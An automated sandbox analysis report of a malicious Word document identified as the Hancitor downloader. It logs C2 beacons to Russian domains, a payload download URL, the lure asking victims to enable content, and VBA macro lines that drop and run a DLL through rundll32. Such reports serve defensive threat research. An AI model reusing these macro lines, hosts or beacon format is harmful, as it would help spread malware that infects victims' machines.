              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001C28D0 lstrlenA,lstrlenA,InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,3_2_001C28D0
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BC642F3-025D-4403-9DBE-B492A11253DC}.tmpJump to behavior
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
              Source: rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
              Source: unknownDNS traffic detected: queries for: api.ipify.org
              Source: unknownHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: rundll32.exeString found in binary or memory: http://api.ipify.org
              Source: rundll32.exe, 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, rundll32.exe, 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmpString found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
              Source: rundll32.exe, 00000003.00000002.3150780627.0000000000424000.00000004.00000001.sdmpString found in binary or memory: http://caperesto.com/8/forum.php
              Source: rundll32.exe, 00000003.00000003.2806499777.0000000000404000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.3150687210.00000000002BA000.00000004.00000001.sdmpString found in binary or memory: http://gru77.ru/6fdsg45ehdf.exe
              Source: rundll32.exe, 00000003.00000002.3150687210.00000000002BA000.00000004.00000001.sdmpString found in binary or memory: http://gru77.ru/6fdsg45ehdf.exe.ru/6fdsg45ehdf.exe99
              Source: rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
              Source: rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
              Source: rundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
              Source: rundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
              Source: rundll32.exe, 00000003.00000002.3151836031.0000000003290000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: rundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
              Source: rundll32.exe, 00000003.00000002.3150780627.0000000000424000.00000004.00000001.sdmpString found in binary or memory: http://watiounds.ru/8/forum.php
              Source: rundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
              Source: rundll32.exe, 00000003.00000002.3151836031.0000000003290000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
              Source: rundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
              Source: rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
              Source: rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hancitor Payload Author: kevoreilly
              Source: 00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hancitor Payload Author: kevoreilly
              Source: 3.2.rundll32.exe.1c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 3.2.rundll32.exe.1b0000.2.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 3.2.rundll32.exe.1c0000.3.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 3.2.rundll32.exe.1b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 3.2.rundll32.exe.c0174.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 3.2.rundll32.exe.c0174.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
              Source: Screenshot number: 4Screenshot OCR: Enable editing txjtton from the yellow bar above 0= you have enabled edmng. please click Engble c
              Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
              Source: Document image extraction number: 0Screenshot OCR: Enable content button from the yellow bar above
              Source: Screenshot number: 8Screenshot OCR: Enable content button from the yellow bar i above i , , , , , ' : ii: ^ a S nmmm O I
              Document contains an embedded VBA macro which may execute processesShow sources
              Source: 0427_5079687843613.docOLE, VBA macro line: kkl = Application.Run("hi", Folders(N))
              Source: 0427_5079687843613.docOLE, VBA macro line: kkl = Application.Run("hi", RootPath)
              Source: 0427_5079687843613.docOLE, VBA macro line: bcsa = Application.Run("Getme", Left(klas, ntgs) & yer)
              Source: 0427_5079687843613.docOLE, VBA macro line: kkx = Application.Run("nyd", myhome, plop & "\ferus.d" & "l" & "l")
              Source: 0427_5079687843613.docOLE, VBA macro line: lassap = Application.Run("nm", ololow)
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Getme, API Microsoft Word:Application.Run("hi","c:\users\user\appdata\Local\Temp")Name: Getme
              Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function hhhhh, API Microsoft Word:Application.Run("Getme","c:\users\user\appdata\Local\Temp")Name: hhhhh
              Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function hi, API Microsoft Word:Application.Run("nyd","c:\users\user\appdata\Local\Temp","c:\users\user\appdata\roaming\microsoft\word\ferus.dll")Name: hi
              Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function stetptwwo, API IWshShell3.Run("rundll32.exe c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS")Name: stetptwwo
              Document contains an embedded VBA macro with suspicious stringsShow sources
              Source: 0427_5079687843613.docOLE, VBA macro line: Set xcvxv = VBA.CreateObject("WScript.Shell")
              Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function stetptwwo, String wscript: Set xcvxv = VBA.CreateObject("WScript.Shell")Name: stetptwwo
              Office process drops PE fileShow sources
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\furmt.fJump to dropped file
              Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018B4CE3_2_0018B4CE
              Source: 0427_5079687843613.docOLE, VBA macro line: Private Sub Document_Open()
              Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
              Source: 0427_5079687843613.docOLE indicator, VBA macros: true
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 00183980 appears 51 times
              Source: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 3.2.rundll32.exe.1c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 3.2.rundll32.exe.1b0000.2.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 3.2.rundll32.exe.1c0000.3.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 3.2.rundll32.exe.1b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 3.2.rundll32.exe.c0174.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 3.2.rundll32.exe.c0174.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
              Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@5/12@174/4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00186E8A GetDiskFreeSpaceA,3_2_00186E8A
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001917A0 FindResourceA,LoadResource,SizeofResource,LockResource,3_2_001917A0
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$27_5079687843613.docJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRAFFD.tmpJump to behavior
              Source: 0427_5079687843613.docOLE indicator, Word Document stream: true
              Source: 0427_5079687843613.docOLE document summary: title field not present or empty
              Source: 0427_5079687843613.docOLE document summary: edited time not present or 0
              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYSJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYSJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001C3580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,3_2_001C3580
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00192358 push dword ptr [ebp-14h]; ret 3_2_00192D2E
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00185834 push 00185860h; ret 3_2_00185858
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018E8C0 push 0018E936h; ret 3_2_0018E92E
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018B91E push 0018B98Fh; ret 3_2_0018B987
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018E938 push 0018E9E0h; ret 3_2_0018E9D8
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018B138 push ecx; mov dword ptr [esp], edx3_2_0018B13D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018B920 push 0018B98Fh; ret 3_2_0018B987
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018B998 push 0018B9CCh; ret 3_2_0018B9C4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018C194 push 0018C1C0h; ret 3_2_0018C1B8
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018B9A0 push 0018B9CCh; ret 3_2_0018B9C4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001921DA push 00192287h; ret 3_2_0019227F
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001921DC push 00192287h; ret 3_2_0019227F
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018E9E2 push 0018EA80h; ret 3_2_0018EA78
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018EA54 push 0018EA80h; ret 3_2_0018EA78
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00182A78 push eax; ret 3_2_00182AB4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00185A6C push 00185B68h; ret 3_2_00185B60
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019228C push 0019231Ch; ret 3_2_00192314
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018EAB8 push 0018EB05h; ret 3_2_0018EAFD
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018EAB7 push 0018EB05h; ret 3_2_0018EAFD
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018EB10 push 0018EB3Ch; ret 3_2_0018EB34
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018EB09 push 0018EB3Ch; ret 3_2_0018EB34
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00185B3C push 00185B68h; ret 3_2_00185B60
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00185364 push 001853B5h; ret 3_2_001853AD
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018B4CE push 0018B91Ch; ret 3_2_0018B914
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00192D44 push 00192D78h; ret 3_2_00192D70
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018561E push 0018564Ch; ret 3_2_00185644
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00185620 push 0018564Ch; ret 3_2_00185644
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00185658 push 00185684h; ret 3_2_0018567C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00190790 push ecx; mov dword ptr [esp], ecx3_2_00190795
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018B7A0 push 0018B91Ch; ret 3_2_0018B914
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_000C73F0 push edx; ret 3_2_000C7667
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\furmt.fJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\furmt.fJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: 0427_5079687843613.docStream path 'Data' entropy: 7.97255502805 (max. 8.0)
              Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 390Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 392Jump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\furmt.fJump to dropped file
              Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-12308
              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018487C GetModuleHandleA,7248FFF6,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_0018487C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001C3400 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,3_2_001C3400
              Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-12549
              Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-12564
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001C3580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,3_2_001C3580
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001C1390 GetProcessHeap,RtlAllocateHeap,3_2_001C1390
              Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page write copy | page execute | page execute read | page execute and read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: gru77.ru
